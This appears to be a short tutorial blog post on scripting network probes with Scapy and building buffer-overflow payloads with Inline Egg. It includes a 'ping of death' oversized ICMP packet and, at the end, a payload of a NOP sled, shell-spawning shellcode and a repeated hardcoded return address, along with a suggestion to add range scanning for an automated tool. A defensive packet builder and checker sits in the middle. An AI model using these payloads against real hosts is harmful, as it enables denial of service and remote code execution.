Between Scapy and Inline Egg, scripting network probes and [remote] buffer overflows has gotten much simpler. Scapy allows you to interactively craft packets and send/receive them; once you've debugged the packet construction, you can drop it into a Python script for re-use. Inline Egg takes care of crafting null-free opcode sequences for hijacking running processes.
Scapy comes with a slew of protocols and handy tools like traceroute, arpcachepoison, p0f, etc. Here's an example of interactively crafting some pings:
# normal ping
>>> ip = IP(dst="192.168.1.1")
>>> pkt = ip/ICMP()/"0xDECAFBAD"
>>> ans,unans = sr( pkt )
.Finished to send 1 packets.
Received 2 packets, got 1 answers, remaining 0 packets
0000 08:11:27.604624 IP / ICMP 192.168.1.50 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.50 echo-reply 0 / Raw / Padding
0000 30 78 44 45 43 41 46 42 41 44 0xDECAFBAD
# ping of death
>>> pkt = ip / ICMP() / "0xDECAFBAD"*6551
>>> ans,drops = sr( pkt )
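Once the interactive session above is debugged, the same packet can live in a plain script. As an added example (not code from the original post or from Scapy), this builds and decodes the IP/ICMP echo request from the session with only the standard library, and adds the per-fragment length check a monitor uses to flag the oversize "ping of death" variant; the TTL, identifier and fragment values are constructed for the demonstration.

```python
import socket
import struct

IP_HDR = struct.Struct("!BBHHHBBH4s4s")  # ver/IHL, TOS, total len, id, flags+frag, TTL, proto, csum, src, dst
ICMP_HDR = struct.Struct("!BBHHH")       # type, code, csum, id, seq

def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words; a valid header checksums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo_request(src, dst, payload, ident=0, seq=0):
    """Scripted stand-in for IP(dst=...)/ICMP()/payload; refuses a datagram IPv4 cannot carry."""
    total_len = IP_HDR.size + ICMP_HDR.size + len(payload)
    if total_len > 0xFFFF:
        raise ValueError("%d bytes exceeds the 65535-byte IPv4 total length" % total_len)
    icmp = ICMP_HDR.pack(8, 0, 0, ident, seq) + payload          # type 8 = echo-request
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = IP_HDR.pack(0x45, 0, total_len, 0, 0, 64, 1, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))  # proto 1 = ICMP; TTL 64 assumed
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp

def parse_icmp(datagram):
    """Decode an IPv4/ICMP datagram and verify both header checksums."""
    ver_ihl, _, total_len, _, flags_frag, _, proto, _, src, dst = IP_HDR.unpack_from(datagram)
    ihl = (ver_ihl & 0x0F) * 4
    if proto != 1 or inet_checksum(datagram[:ihl]) != 0:
        raise ValueError("not ICMP, or bad IP header checksum")
    icmp = datagram[ihl:total_len]
    typ, code, _, ident, seq = ICMP_HDR.unpack_from(icmp)
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "type": typ, "code": code, "id": ident, "seq": seq,
            "frag_offset": (flags_frag & 0x1FFF) * 8, "more_fragments": bool(flags_frag & 0x2000),
            "payload": icmp[ICMP_HDR.size:], "icmp_checksum_ok": inet_checksum(icmp) == 0}

def oversized_on_reassembly(total_len, flags_frag, ihl=20):
    """Ping-of-death indicator for one fragment: its offset plus its data would end past 65535 bytes."""
    return (flags_frag & 0x1FFF) * 8 + (total_len - ihl) > 0xFFFF
```

The last 10 bytes of the built packet are the same `30 78 44 45 43 41 46 42 41 44` that Scapy's answer dump shows for the "0xDECAFBAD" payload.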
Inline Egg has a lot of power; check out the basic shellcode creation below. One just needs to parametrize this and add some range scanning, and you have a very usable automated tool.
import struct
import inlineegg.inlineegg as ie

# An egg is built on a syscall class for the target OS: ie.Linuxx86Syscall here,
# or ie.FreeBSDx86Syscall / ie.OpenBSDx86Syscall. stdinShellEgg() is a helper of
# your own (as in the InlineEgg example scripts) that constructs
# ie.InlineEgg(ie.Linuxx86Syscall), adds the stdin-shell syscalls and returns it.
egg = stdinShellEgg()

retAddr = struct.pack('<L', 0xbffffc24)          # little-endian return address
toSend = "\x90" * (1024 - len(egg.getCode()))    # NOP sled filling the 1024-byte buffer ahead of the egg
toSend += egg.getCode()                          # the null-free shellcode itself
toSend += retAddr * 20                           # return address, repeated 20 times